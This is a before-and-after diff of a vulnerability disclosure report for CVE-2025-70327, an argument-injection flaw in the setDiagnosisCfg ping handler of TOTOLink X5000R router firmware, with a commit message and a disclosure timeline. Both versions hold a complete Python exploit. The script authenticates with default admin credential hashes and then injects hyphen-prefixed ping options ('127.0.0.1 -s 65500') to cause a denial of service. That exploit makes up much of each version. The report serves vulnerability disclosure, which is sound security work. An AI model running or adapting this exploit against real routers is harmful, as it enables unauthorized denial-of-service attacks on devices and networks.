Toto-link/X5000R/SetDiagnosisCfg/report.md, before:

# CVE-2025-70327
1.	Vulnerability Title
    
    a.  TOTOLink X5000R_Latest bug fix version v9.1.0cu_2415_B20250515 Ping of Death

    b.  Vulnerability Type: Argument Injection (CWE-88)

3. High-level overview of the vulnerability and the possible effect of using it

    In the affected handler, user-supplied parameters are embedded into a system command without validating or rejecting hyphen-prefixed arguments. This argument-injection issue (similar to CVE-2025-52905) lets an attacker smuggle arbitrary command-line options into the invoked tool (e.g., ping). By supplying crafted flags, an attacker can trigger a denial of service (DoS)-for example, by forcing extremely long runtimes or resource-intensive behavior-leading to router hangs/reboots and the potential to overwhelm remote hosts or upstream networks.

4.	Exact product that was found to be vulnerable including complete version information
    a. vulnerable code exists in TOTOLink X5000R_Latest

    b. We tested the vulnerability on TOTOLink X5000R_Latest bug fix version v9.1.0cu_2415_B20250515

5. Root Cause Analysis

    Since vendor does not provide source code, the following explanation is based on the firmware binary /usr/sbin/lighttpd

    a. Detailed description of the vulnerability
    
    In the function sub_413BB8, In sub_413BB8, the user-controlled ip parameter is copied straight into a shell command without sanitization:

snprintf(v6, 128, "ping %s -w %d &>/var/log/pingCheck", Var, v3);
CsteSystem(v6, 0);

Because Var (from websGetVar(..., "ip", ...)) is only checked by is_cmd_string_valid and not restricted from starting with a hyphen, an attacker can inject option-like arguments (e.g., strings beginning with -). This is an argument-injection flaw: the program believes it's inserting a hostname, but the shell-constructed line hands those hyphen-prefixed tokens to ping as flags. By supplying abusive options that prolong execution or increase workload, an attacker can cause a denial of service (DoS) - tying up the router's process/thread and CPU or generating excessive traffic toward remote hosts.

```c
int __fastcall sub_413BB8(int a1)
{
  int v2; // $v0
  int v3; // $s1
  const char *Var; // [sp+24h] [-90h]
  _BYTE v6[128]; // [sp+2Ch] [-88h] BYREF

  memset(v6, 0, sizeof(v6));
  Var = (const char *)websGetVar(a1, "ip", "www.baidu.com");
  v2 = websGetVar(a1, "num", "");
  v3 = atoi(v2);
  if ( is_cmd_string_valid(Var) )
  {
    snprintf(v6, 128, "ping %s -w %d &>/var/log/pingCheck", Var, v3);
    CsteSystem(v6, 0);
    sub_4038F8("0", "reserv");
    return 1;
  }
  else
  {
    sub_4038F8("0", "Parameter Error!");
    return 0;
  }
}
```

    b. suggested fixes

    Add validation to reject values beginning with '-' and move from shell-based execution to exec* with an argv array and -- end-of-options delimiter; additionally, enforce strict allow-listing for host/IP and bound all numeric parameters.

    
5.   Exploit

```python
import requests
import json
import hashlib
import time
import re
import sys
import ipaddress

# --- 1. Login authentication function: get_auth_session (user-provided code as is) ---

def get_auth_session(ip_address, username_hash, password_hash):
    """
    Send a login authentication request and return an authenticated session object upon successful authentication.
    """
    url = f"http://{ip_address}/cgi-bin/cstecgi.cgi"
    
    payload = {
        "username": username_hash,
        "password": password_hash,
        "flag": "0",
        "topicurl": "loginAuth",
        "token": "" 
    }

    # Request Header
    headers = {
        "Host": ip_address,
        "X-Requested-With": "XMLHttpRequest",
        "Accept-Language": "ko-KR,ko;q=0.9",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36",
        "Origin": f"http://{ip_address}",
        "Referer": f"http://{ip_address}/login.html",
        "Connection": "keep-alive"
    }

    data_string = json.dumps(payload, separators=(',', ':'))

    print(f"Start login request: {url}")
    print(f"Payload: {data_string}")

    s = requests.Session()
    s.headers.update(headers)

    try:
        response = s.post(url, data=data_string, verify=False, timeout=10)
        
        print(f"\n--- Response information (loginAuth) ---")
        print(f"Response status code: {response.status_code}")
        print(f"Response Body Raw Text:")
        print(response.text) 
        
        response_text = response.text.strip()
        
        is_success = response.status_code == 200 and (re.search(r'"loginFlag"\s*:\s*0', response_text) is not None)
        
        if is_success:
            print("\n[+] **Verify login success! Proceed to the next step")
            return s # Return Authenticated Session Object
        else:
            print("\nLogin failed. No pattern was found in the response signal indicating success.")

    except requests.exceptions.RequestException as e:
        print(f"\nRequest Error Occurred: {e}")
        
    return None # Return None on Failure

# --- 2. Configuration request processing function (add command execution result separation logic) ---

def handle_config_requests(ip_address, token_value, auth_session):
    
    url = f"http://{ip_address}/cgi-bin/cstecgi.cgi"
    
    # 2-1. First request: getWizardCfg (verify authentication token)
    print("\n" + "="*50)
    print("1. getWizardCfg request (check authentication token)")
    print("="*50)
    
    get_payload = {"topicurl": "getWizardCfg", "token": token_value}
    get_data = json.dumps(get_payload, separators=(',', ':'))
    
    try:
        response = auth_session.post(url, data=get_data, verify=False, timeout=10)
        
        if "errcode" not in response.text or "token invalid" not in response.text:
            print(f"Response Status Code: {response.status_code}")
            print("Response Body:", response.text)
            print("\n[+] **getWizardCfg Successful:** Authenticated tokens are valid. Try the following setup request.")
        else:
            print(f"Response Status Code: {response.status_code}")
            print("\n[-] getWizardCfg failed: token is invalid skip command insert request.")
            print("Response Body:", response.text)
            return


    except requests.exceptions.RequestException as e:
        print(f"\n[Error] getWizardCfg request failed: {e}")
        return

    set_payload = {
        "topicurl": "setDiagnosisCfg",
        "ip": "127.0.0.1 -s 65500",
        "num": "10",
        "token": token_value
    }
    
    set_data = json.dumps(set_payload, separators=(',', ':'))
    
    print(f"Payload: {set_data}")
    
    try:
        response = auth_session.post(url, data=set_data, verify=False) 
        
        json_start = response.text.find('{')
        
        if json_start != -1:
            cmd_output = response.text[:json_start].strip()
            json_response = response.text[json_start:].strip()
            
            print(f"\nResponse Status Code: {response.status_code}")
            print("\n==============================================")
            print("[+] Command Execution Results (Raw Output)")
            print("==============================================")
            print(cmd_output)
            print("\n==============================================")
            print("[+] Server's final JSON response")
            print("==============================================")
            print(json_response)
        else:
            print(f"\nResopnse Status Code: {response.status_code}")
            print("Response Body (JSON not found):")
            print(response.text)

    except requests.exceptions.ReadTimeout:
        print("\n**[-] Read Timeout Occurred! (Over 10 seconds)** The server may have delayed response after executing the command.")
        print(" Return to the VM to see the results of the command execution.")
        
    except requests.exceptions.RequestException as e:
        print(f"\n[Error] Setting request error occurred: {e}")

# --- 3. Practice ---

def validate_ip(ip_address):
    """IP address format validation"""
    try:
        ipaddress.ip_address(ip_address)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    
    # 3.0. Getting an IP address from a user
    while True:
        IP_ADDR = input("Enter the destination IP address to access (e.g. 192.168.0.12): ").strip()
        if validate_ip(IP_ADDR):
            break
        else:
            print("[Error] This is not a valid IP address format. Please re-enter.")
            
    USER_HASH = "21232f297a57a5a743894a0e4a801fc3" 
    PASS_HASH = "21232f297a57a5a743894a0e4a801fc3" 
    
    print(f"\nDestination IP address: {IP_ADDR}")

    # 3.1. Attempt to obtain an authenticated session object
    auth_session = get_auth_session(IP_ADDR, USER_HASH, PASS_HASH)
    
    # 3.2. If the authentication is successful, the next time you request it
    if auth_session:
        print("\n\n--- Step 1: Enter authentication token values ---")
        input_token = input("Please enter a new token (value to try): ")
        
        handle_config_requests(IP_ADDR, input_token, auth_session)
    else:
        print("\nThe final authentication was not successful. The following requests could not be processed.")
```

Commit message:

Revise CVE-2025-70327 report for clarity and detail
Added discoverer and vulnerability type sections. Updated the overview and root cause analysis for clarity and consistency.

Toto-link/X5000R/SetDiagnosisCfg/report.md, after:

# CVE-2025-70327
**Discoverer:** Neighborhood-Hacker Team
**Vulnerability Type:** Argument Injection (CWE-88)

1.	Vulnerability Title
    
    a.  TOTOLink X5000R_Latest bug fix version v9.1.0cu_2415_B20250515 Ping of Death

2. High-level overview of the vulnerability and the possible effect of using it

    In the `setDiagnosisCfg` handler of the `/usr/sbin/lighttpd` executable, user-supplied parameters are embedded into a system command without validating or rejecting hyphen-prefixed arguments. This argument-injection issue (similar to CVE-2025-52905) lets an attacker smuggle arbitrary command-line options into the invoked tool (e.g., ping). By supplying crafted flags, an attacker can trigger a denial of service (DoS)-for example, by forcing extremely long runtimes or resource-intensive behavior-leading to router hangs/reboots and the potential to overwhelm remote hosts or upstream networks.

3.	Exact product that was found to be vulnerable including complete version information
    a. vulnerable code exists in TOTOLink X5000R_Latest

    b. We tested the vulnerability on TOTOLink X5000R_Latest bug fix version v9.1.0cu_2415_B20250515

4. Root Cause Analysis

    Since vendor does not provide source code, the following explanation is based on the firmware binary /usr/sbin/lighttpd

    a. Detailed description of the vulnerability
    
    In the function sub_413BB8, the user-controlled ip parameter is copied straight into a shell command without sanitization:

    snprintf(v6, 128, "ping %s -w %d &>/var/log/pingCheck", Var, v3);
    CsteSystem(v6, 0);

    Because Var (from websGetVar(..., "ip", ...)) is only checked by is_cmd_string_valid and not restricted from starting with a hyphen, an attacker can inject option-like arguments (e.g., strings beginning with -). This is an argument-injection flaw: the program believes it's inserting a hostname, but the shell-constructed line hands those hyphen-prefixed tokens to ping as flags. By supplying abusive options that prolong execution or increase workload, an attacker can cause a denial of service (DoS) - tying up the router's process/thread and CPU or generating excessive traffic toward remote hosts.

```c
int __fastcall sub_413BB8(int a1)
{
  int v2; // $v0
  int v3; // $s1
  const char *Var; // [sp+24h] [-90h]
  _BYTE v6[128]; // [sp+2Ch] [-88h] BYREF

  memset(v6, 0, sizeof(v6));
  Var = (const char *)websGetVar(a1, "ip", "www.baidu.com");
  v2 = websGetVar(a1, "num", "");
  v3 = atoi(v2);
  if ( is_cmd_string_valid(Var) )
  {
    snprintf(v6, 128, "ping %s -w %d &>/var/log/pingCheck", Var, v3);
    CsteSystem(v6, 0);
    sub_4038F8("0", "reserv");
    return 1;
  }
  else
  {
    sub_4038F8("0", "Parameter Error!");
    return 0;
  }
}
```

    b. suggested fixes

    Add validation to reject values beginning with '-' and move from shell-based execution to exec* with an argv array and -- end-of-options delimiter; additionally, enforce strict allow-listing for host/IP and bound all numeric parameters.

    
5.   Exploit

```python
import requests
import json
import hashlib
import time
import re
import sys
import ipaddress

# --- 1. Login authentication function: get_auth_session (user-provided code as is) ---

def get_auth_session(ip_address, username_hash, password_hash):
    """
    Send a login authentication request and return an authenticated session object upon successful authentication.
    """
    url = f"http://{ip_address}/cgi-bin/cstecgi.cgi"
    
    payload = {
        "username": username_hash,
        "password": password_hash,
        "flag": "0",
        "topicurl": "loginAuth",
        "token": "" 
    }

    # Request Header
    headers = {
        "Host": ip_address,
        "X-Requested-With": "XMLHttpRequest",
        "Accept-Language": "ko-KR,ko;q=0.9",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36",
        "Origin": f"http://{ip_address}",
        "Referer": f"http://{ip_address}/login.html",
        "Connection": "keep-alive"
    }

    data_string = json.dumps(payload, separators=(',', ':'))

    print(f"Start login request: {url}")
    print(f"Payload: {data_string}")

    s = requests.Session()
    s.headers.update(headers)

    try:
        response = s.post(url, data=data_string, verify=False, timeout=10)
        
        print(f"\n--- Response information (loginAuth) ---")
        print(f"Response status code: {response.status_code}")
        print(f"Response Body Raw Text:")
        print(response.text) 
        
        response_text = response.text.strip()
        
        is_success = response.status_code == 200 and (re.search(r'"loginFlag"\s*:\s*0', response_text) is not None)
        
        if is_success:
            print("\n[+] **Verify login success! Proceed to the next step")
            return s # Return Authenticated Session Object
        else:
            print("\nLogin failed. No pattern was found in the response signal indicating success.")

    except requests.exceptions.RequestException as e:
        print(f"\nRequest Error Occurred: {e}")
        
    return None # Return None on Failure

# --- 2. Configuration request processing function (add command execution result separation logic) ---

def handle_config_requests(ip_address, token_value, auth_session):
    
    url = f"http://{ip_address}/cgi-bin/cstecgi.cgi"
    
    # 2-1. First request: getWizardCfg (verify authentication token)
    print("\n" + "="*50)
    print("1. getWizardCfg request (check authentication token)")
    print("="*50)
    
    get_payload = {"topicurl": "getWizardCfg", "token": token_value}
    get_data = json.dumps(get_payload, separators=(',', ':'))
    
    try:
        response = auth_session.post(url, data=get_data, verify=False, timeout=10)
        
        if "errcode" not in response.text or "token invalid" not in response.text:
            print(f"Response Status Code: {response.status_code}")
            print("Response Body:", response.text)
            print("\n[+] **getWizardCfg Successful:** Authenticated tokens are valid. Try the following setup request.")
        else:
            print(f"Response Status Code: {response.status_code}")
            print("\n[-] getWizardCfg failed: token is invalid skip command insert request.")
            print("Response Body:", response.text)
            return


    except requests.exceptions.RequestException as e:
        print(f"\n[Error] getWizardCfg request failed: {e}")
        return

    set_payload = {
        "topicurl": "setDiagnosisCfg",
        "ip": "127.0.0.1 -s 65500",
        "num": "10",
        "token": token_value
    }
    
    set_data = json.dumps(set_payload, separators=(',', ':'))
    
    print(f"Payload: {set_data}")
    
    try:
        response = auth_session.post(url, data=set_data, verify=False) 
        
        json_start = response.text.find('{')
        
        if json_start != -1:
            cmd_output = response.text[:json_start].strip()
            json_response = response.text[json_start:].strip()
            
            print(f"\nResponse Status Code: {response.status_code}")
            print("\n==============================================")
            print("[+] Command Execution Results (Raw Output)")
            print("==============================================")
            print(cmd_output)
            print("\n==============================================")
            print("[+] Server's final JSON response")
            print("==============================================")
            print(json_response)
        else:
            print(f"\nResopnse Status Code: {response.status_code}")
            print("Response Body (JSON not found):")
            print(response.text)

    except requests.exceptions.ReadTimeout:
        print("\n**[-] Read Timeout Occurred! (Over 10 seconds)** The server may have delayed response after executing the command.")
        print(" Return to the VM to see the results of the command execution.")
        
    except requests.exceptions.RequestException as e:
        print(f"\n[Error] Setting request error occurred: {e}")

# --- 3. Practice ---

def validate_ip(ip_address):
    """IP address format validation"""
    try:
        ipaddress.ip_address(ip_address)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    
    # 3.0. Getting an IP address from a user
    while True:
        IP_ADDR = input("Enter the destination IP address to access (e.g. 192.168.0.12): ").strip()
        if validate_ip(IP_ADDR):
            break
        else:
            print("[Error] This is not a valid IP address format. Please re-enter.")
            
    USER_HASH = "21232f297a57a5a743894a0e4a801fc3" 
    PASS_HASH = "21232f297a57a5a743894a0e4a801fc3" 
    
    print(f"\nDestination IP address: {IP_ADDR}")

    # 3.1. Attempt to obtain an authenticated session object
    auth_session = get_auth_session(IP_ADDR, USER_HASH, PASS_HASH)
    
    # 3.2. If the authentication is successful, the next time you request it
    if auth_session:
        print("\n\n--- Step 1: Enter authentication token values ---")
        input_token = input("Please enter a new token (value to try): ")
        
        handle_config_requests(IP_ADDR, input_token, auth_session)
    else:
        print("\nThe final authentication was not successful. The following requests could not be processed.")
```

6. Disclosure Timeline
    - 2025-10-22: Vulnerability reported to vendor (TOTOLINK).
    - 2025-12-21: No response from vendor after 60 days.
    - 2025-12-22: Vulnerability reported to MITRE (CVE Assignment Team).
    - 2026-02-11: CVE ID assigned (RESERVED state).
    - 2026-02-23: Public disclosure (0-day) and notification to MITRE for publication.
